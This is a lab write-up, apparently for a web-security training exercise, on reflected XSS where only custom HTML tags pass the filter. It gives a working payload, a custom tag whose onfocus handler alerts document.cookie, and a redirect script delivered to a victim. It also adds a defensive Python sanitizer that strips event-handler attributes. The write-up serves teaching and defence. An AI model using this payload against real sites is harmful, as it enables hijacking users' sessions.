LAB 15 - Reflected XSS into HTML context with all tags blocked except custom ones
Initial instructions
This lab blocks all HTML tags except custom ones.
To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.
To complete this lab I used the following XSS payload.
So I entered this payload into the search parameter in the URL.

And it got triggered.

Now let's go to our exploit server and send the XSS to our victim.

So I built the following payload to deliver to the victim using location.
<script> location = 'https://0a7900a1032ff63a80f1539700cc0036.web-security-academy.net/?search=%3Ccustom-tag+onfocus%3D%27alert(document.cookie)%27+id%3D%27x%27+tabindex%3D%221%22%3E#x' </script>

And deliver the exploit to the victim.
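As an added defender-side example (my own code, not part of the original write-up or of the lab), a small Python sanitizer that shows why the lab's filter fails: filtering on tag name still lets a custom element carry an onfocus handler, and tabindex plus a URL fragment focuses it with no user interaction. The sanitizer keeps custom elements but drops every attribute outside a short allowlist; the SAFE_ATTRS set and the SAMPLE string are assumptions I constructed.

```python
from html import escape
from html.parser import HTMLParser

# Attributes a custom element may keep; everything else (every on* handler,
# tabindex, autofocus, ...) is dropped regardless of the tag name.
SAFE_ATTRS = {"id", "class", "title"}

class CustomElementSanitizer(HTMLParser):
    """Rebuilds markup, letting only hyphenated custom elements through and
    stripping their attributes down to SAFE_ATTRS. Filtering on tag name alone
    (the lab's approach) still leaves on* handlers reachable."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # audit trail of what was removed, useful for logging

    def handle_starttag(self, tag, attrs):
        if "-" not in tag:  # standard HTML element: drop the tag, keep its text
            self.dropped.append(tag)
            return
        parts = [tag]
        for name, value in attrs:
            if name not in SAFE_ATTRS:
                self.dropped.append(f"{tag}@{name}")
                continue
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if "-" in tag:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-escaped on output

def sanitize(markup):
    """Return (clean_markup, dropped_items)."""
    p = CustomElementSanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.dropped

# Constructed sample: the URL-decoded form of the payload in the lab's search parameter.
SAMPLE = "<custom-tag onfocus='alert(document.cookie)' id='x' tabindex=\"1\">hi</custom-tag>"

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE)
    print(clean)    # <custom-tag id="x">hi</custom-tag>
    print(dropped)  # ['custom-tag@onfocus', 'custom-tag@tabindex']
```

Logging the dropped list on the server side also gives a cheap detection signal: a search parameter that sheds an on* attribute from a custom element is worth an alert.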